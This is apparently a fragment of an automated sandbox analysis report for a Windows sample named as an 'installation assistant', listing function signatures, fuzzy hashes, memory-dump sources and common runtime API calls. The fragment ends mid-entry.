                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                                          • Instruction ID: abcc2d99fec4f5f72455f0c331482e226a61248c6be2ef21b984eac2e8ba80cd
                                                          • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                                          • Instruction Fuzzy Hash: 7C128F712097458BC728CF28C49066AFBE2BFD9344F54892DE99687B41DB31E846CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                          • Instruction ID: 4472c5ba3a85a9a71b46e0a633984496866f090bf580c2181b6f4436c0d1ad5b
                                                          • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                          • Instruction Fuzzy Hash: D4022732A0C2118BD319CE2CC4A0359BBF6FBC4355F194B2EE596A7A94DB74D844CF92
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                                          • Instruction ID: 1d2f7669b9ba7c7dc4de5df5abd1db24dd5fa70f60a5a44e567f6d0bf0d8390e
                                                          • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                                          • Instruction Fuzzy Hash: 6EF114327042898BEB24CE29D8607EEB7E2FBC5304F58453DD899CBB41DB35951ACB91
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                          • Instruction ID: 1d69946cb2694d4a5a1b96d4d065b9398ec15d9d28c8c3b8e72e3b77fc5b0b6b
                                                          • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                          • Instruction Fuzzy Hash: 8ED1F1715046168FD728CF1CC4A4636BBE1FF86304F054ABDEAA28B79AD7389615CB60
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                                          • Instruction ID: 4a9148662c9ac85a864fa3e078bf8a87e321f0e57260448dd0b7cc4e68857ab7
                                                          • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                                          • Instruction Fuzzy Hash: DCC1D6352047418BC728CF39D1A4697BBE2EFE9314F148A6DC8CA4BB55DA34A40ECB65
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                                          • Instruction ID: 53b006015772d70b96a6be83065121aab121a6fc472bfeff1ec46e1763ee6a95
                                                          • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                                          • Instruction Fuzzy Hash: C1B1C131309B054BD324DF3AC8907DAB7E1AF95708F14462DC5AB87B81EF31A619CB95
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                                          • Instruction ID: a51880bc0fef45d0342cf7f089ceb5e868fecad5ee3b0248bd84fd7c026778fb
                                                          • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                                          • Instruction Fuzzy Hash: 59B1AB756087028BC314DF29C8906EBF7E2FFD8304F24892DE49A87711E771A55ACBA5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                                          • Instruction ID: 4dca7d85d5acd65a78a966d0aa9e94169931afd9452645e0cf0e563ed07b0676
                                                          • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                                          • Instruction Fuzzy Hash: 56A1F37260C7418FC728CF29C4A069ABBF1AFD5308F544A2DE4DA87B40D631E94ECB52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                                          • Instruction ID: 38fe67edd78834f3d6b6dbe57dba6875e1cc7a0c94a41886947439bdd9d4b618
                                                          • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                                          • Instruction Fuzzy Hash: CF81D435A047058FC320CF29C090246F7E1FF99714F28CA6DC5999B715E776E94ACB91
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                          • Instruction ID: 9117eb05a9d951320b693df654e216993feadfbd8fe4faddb415d63cb9734b18
                                                          • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                          • Instruction Fuzzy Hash: 25519F72F146099BDF08CE98D9A17ADB7F1EB98304F248179D115E7B81D7789A41CB40
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                          • Instruction ID: 004697f8595dc0c7d42ae9754df75e5d914e1f360d48bf4209bb525e9be64299
                                                          • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                          • Instruction Fuzzy Hash: 953114277A840103C70CCE3BCC1679F91535BE562A70ECF796C05DEF55D52CC8124144
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                                          • Instruction ID: c8689d927c3a903895052a2a746cf45e2cfd4334818ae3161f65ae48bd39cc1e
                                                          • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                                          • Instruction Fuzzy Hash: C5219077320A064BE74C8A38D83737532D0A705318F98A22DEA6BCE2C2D73AC457C785
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73b2c9c62382944de1616b5b6cc4261e3d9160605a97cdfc134f4d4d8cdd27bb
                                                          • Instruction ID: b582f58ef9d89abc5c1e11b0751ff9cf61f5b141b5523e36bc66aa846b7e71ca
                                                          • Opcode Fuzzy Hash: 73b2c9c62382944de1616b5b6cc4261e3d9160605a97cdfc134f4d4d8cdd27bb
                                                          • Instruction Fuzzy Hash: F4F01C32A25324EBCF129A88C405B8972F8EB45B65F120096A505AB640C7B4EE409BD0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction ID: 27b7c54eb5953770e97a6f6115d744d7e92beb3f018496988b6269d356fe27ef
                                                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction Fuzzy Hash: A1E08C72A12338EBCB15EF88C900E8AB3ECEB45A05B220496B501D3610D670EE00CBD0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                                          • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                                          • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                                          • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                                          • API String ID: 3519838083-609671
                                                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction ID: 7865b96e59aa96583483558e8f843adaac20d1103eda7a5f271e5c98267cca84
                                                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction Fuzzy Hash: 45D10639A04209DFCF11CFB4D990BEEB7B5FF15309F244059E455A3A50DB78AA89CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$H_prolog
                                                          • String ID: >WJ$x$x
                                                          • API String ID: 2300968129-3162267903
                                                          • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                                          • Instruction ID: e33a0365a2df44057f2b78608595da2dc0114758c1d5eba51e75b198ba34a44f
                                                          • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                                          • Instruction Fuzzy Hash: A2127A7190421DEFDF10DFA4C880AEDBBB5FF18318F208569E915ABA50DB3A9A45CF50
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C0C9B07
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0C9B0F
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C0C9B98
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0C9BC3
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C0C9C18
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                                          • Instruction ID: 248b647b548985cc82dbf524d41ab9795b036e2e42ce8fb00be39b9ab36ca4e7
                                                          • Opcode Fuzzy Hash: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                                          • Instruction Fuzzy Hash: 0A418E34B10219ABCF00DF68C884BDEBBF5AF4521CF158155E8159BB51DB36AA05CF92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          • Opcode ID: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                                          • Instruction ID: f21468d2327a1c8a36667c154faf9d3c29340ae8e33a855014bdc6422798d3b2
                                                          • Opcode Fuzzy Hash: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                                          • Instruction Fuzzy Hash: 8221C632A56B31BBDB114B69CC40B0A36E89F07768F170A50EC25E7A80DB30FD0085E2
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                                          • __fassign.LIBCMT ref: 6C0DC0D8
                                                          • __fassign.LIBCMT ref: 6C0DC0F5
                                                          • WriteFile.KERNEL32(?,6C0E5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC13D
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C0DC17D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC229
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID:
                                                          • API String ID: 4031098158-0
                                                          • Opcode ID: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                                          • Instruction ID: c6a783d8a3aa24b557a54ea31d28ae4ce6ea9288a7d22d1f334704c3e870e5b0
                                                          • Opcode Fuzzy Hash: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                                          • Instruction Fuzzy Hash: F4D19B75E012989FCF11CFE8C880AEDBBF5BF49314F25415AE856AB241D631AA46CF50
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                                          • __Getctype.LIBCPMT ref: 6BF93084
                                                          • std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                          • String ID:
                                                          • API String ID: 1102183713-0
                                                          • Opcode ID: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                                          • Instruction ID: e9dd71bfa0bf4bc6e2a47e18f1249ae8981637b791f996d232dc01af1ec136ac
                                                          • Opcode Fuzzy Hash: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                                          • Instruction Fuzzy Hash: 90418DB2E042548FEB14DF98D854BAEBBF0FF44714F004159D829AB760D739AA04CF91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$__aullrem
                                                          • String ID:
                                                          • API String ID: 2022606265-0
                                                          • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction ID: 46df268e7501fd47bc41ac3def7f9f26c10e0fb9678d60b13b5ed515b16c951c
                                                          • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction Fuzzy Hash: AA219E70A01219BBDF208E948C80EDF7E69FF467A8F248626B52461694DA71CD60CAE5
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C10A6F1
                                                            • Part of subcall function 6C119173: __EH_prolog.LIBCMT ref: 6C119178
                                                          • __EH_prolog.LIBCMT ref: 6C10A8F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: IJ$WIJ$J
                                                          • API String ID: 3519838083-740443243
                                                          • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction ID: 3d75961bfbc3dadb5d5bb7696bd7823ca9d2605f34140845fe26f0392871312f
